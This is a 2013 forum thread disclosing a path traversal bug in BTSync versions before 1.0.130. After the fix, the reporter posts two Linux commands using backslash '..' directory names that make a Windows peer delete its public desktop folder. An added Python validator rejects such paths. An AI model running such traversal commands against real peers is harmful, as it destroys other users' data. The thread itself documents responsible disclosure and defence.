rdebath Posted May 7, 2013

If you have any public shares running now REMOVE THEM.
BTSync will delete directories outside the share.

[HOWTO Section Deleted]

It should be possible to use this to delete ANY directory on the Windows machine.
Bad examples are obvious!

THIS IS ALPHA SOFTWARE, IT WILL HAVE SERIOUS BUGS.

PS: This applies to versions below 1.0.130

Automatic Coding Posted May 7, 2013

May I ask how? Would you have to craft a special packet to send like:-
Please remove ..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\Drivers\etc\hosts
Or can you literally just say:-
Please remove C:\Windows\System32\Drivers\etc\hosts
Or what?

thequickbrownfox Posted May 7, 2013

Downloaded the Windows client today, did a few searches, found the Short, insecure "secrets" thread, and the cats secret (R27WAH4LQCGDFOGS7NLQYLQPXW5TRCW5) which I put in a New Folder on my desktop. After an hour or two of downloading, lots of cat pictures, I noticed a folder called "Hello" being created and deleted on my desktop. It didn't contain anything but its very presence indicates a glitch that allows somebody to create/delete files/folders one directory higher than the one they're linked to.

Is this the security issue OP describes? I have shut down and uninstalled Sync.

MRACHINI Posted May 7, 2013

Did you have by any chance "enable debug logging" on?

rdebath (Author) Posted May 7, 2013

> May I ask how? Would you have to craft a special packet to send like:-
> Please remove ..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\Drivers\etc\hosts
> Or can you literally just say:-
> Please remove C:\Windows\System32\Drivers\etc\hosts
> Or what?

It's kinda like the first one, no absolute paths, but you don't have to decrypt any packets to do it. The "exploit code" is very very short.
Too short for me to give too many hints, without giving people a chance to see this thread.

thequickbrownfox Posted May 7, 2013

> Did you have by any chance "enable debug logging" on?

Not that I was aware of. The OP has replied since giving a bigger clue.
LOLHAX anyone?!

kos13 Posted May 7, 2013

This issue will be fixed today. Thank you for reporting.

kos13 Posted May 7, 2013

Please upgrade to latest build:
http://syncapp.bittorrent.com/1.0.130/

crash893 Posted May 7, 2013

I'm on 1.0.116 and when I click check for update it says I'm good? What's the deal?

GreatMarko Posted May 7, 2013

> I'm on 1.0.116 and when I click check for update it says I'm good? What's the deal?

New builds are presently announced on the forum in the first instance, and will then become available through the "Check for update" button/auto update function at a later stage.
The download on the main website has also been updated to build 1.0.130

rdebath (Author) Posted May 7, 2013

Version 1.0.130 looks good.
Though the Windows client seems to get stuck if you give it bad file names.

ojchase Posted May 9, 2013

Thanks to whoever put the link to this page in the cats share. And thanks for getting such a quick fix out! Any additional insight in what was happening or why?

rdebath (Author) Posted May 9, 2013

You're welcome.
I'll put the actual problem howto up when they turn on push for the next version; will be soon now.

rdebath (Author) Posted May 28, 2013

Okay, 20 days, not too bad: here and here ⟹ c&p pm

[HOWTO Section SHOWN]

With a share that has both Linux and Windows 7 hosts, on the Linux machine run these commands:

$ mkdir '..\..\..\Users\Public\Desktop'
$ echo test > '..\..\..\Users\Public\Desktop'/Testfile.txt

NOTICE the use of backslashes, not forward slashes.

The Windows shared desktop directory will be removed.
Its contents may be moved to another directory on the machine.

Be careful out there!

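A receiving-side check for the class of bug shown in the HOWTO above, as an added example that is not part of the thread and is not BTSync's code or its 1.0.130 fix. It assumes a Windows receiver that gets relative names from peers; the share root `C:\Users\alice\Sync` and the function names are constructed for illustration.

```python
from pathlib import PureWindowsPath

class UnsafePeerPath(ValueError):
    """A peer-supplied name that could land outside the share root."""

# Characters Windows does not allow inside one name component. ':' also
# covers drive letters ("C:") and alternate data streams ("name:stream").
FORBIDDEN = set('<>:"|?*') | {chr(c) for c in range(32)}

def split_peer_path(rel):
    """Split a peer-supplied relative path the way a Windows host sees it.

    On Linux a backslash is an ordinary file name character, so one
    directory can be called '..\\..\\x'. On Windows each backslash is a
    separator, so both '/' and '\\' are split on before validating.
    """
    parts = rel.replace("\\", "/").split("/")
    for part in parts:
        if part in ("", ".", ".."):
            raise UnsafePeerPath(f"empty or dot component in {rel!r}")
        if FORBIDDEN & set(part):
            raise UnsafePeerPath(f"forbidden character in {rel!r}")
    return parts

def resolve_in_share(share_root, rel):
    """Return the Windows path for rel, or raise if it leaves share_root."""
    root = PureWindowsPath(share_root)
    target = root.joinpath(*split_peer_path(rel))
    if root not in target.parents:  # defence in depth after the split
        raise UnsafePeerPath(f"{rel!r} resolves outside {share_root!r}")
    return target

def audit(share_root, names):
    """Map each name to its resolved path, or to None if it is rejected."""
    result = {}
    for name in names:
        try:
            result[name] = resolve_in_share(share_root, name)
        except UnsafePeerPath:
            result[name] = None
    return result

if __name__ == "__main__":
    # Constructed share root; the second name is the one from the HOWTO.
    samples = ["cats/tabby.jpg", r"..\..\..\Users\Public\Desktop/Testfile.txt"]
    for name, path in audit(r"C:\Users\alice\Sync", samples).items():
        print(f"{name!r:50} -> {path if path else 'REJECTED'}")
```
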
aid85 Posted June 20, 2013

What happens when I update a BTSync installation?
Do the sync folders need to be relinked (new secret and new hashing)?

GreatMarko Posted June 20, 2013

> What happens when I update a BTSync installation?
> Do the sync folders need to be relinked (new secret and new hashing)?

I'm not quite sure how this relates in any way to this particular thread?!! Please post your questions in a relevant thread, or if no relevant thread already exists in the forum, feel free to create a new one. Your post here bears no relevance to the subject matter of this particular thread, which had - until your post - been dormant for almost a month!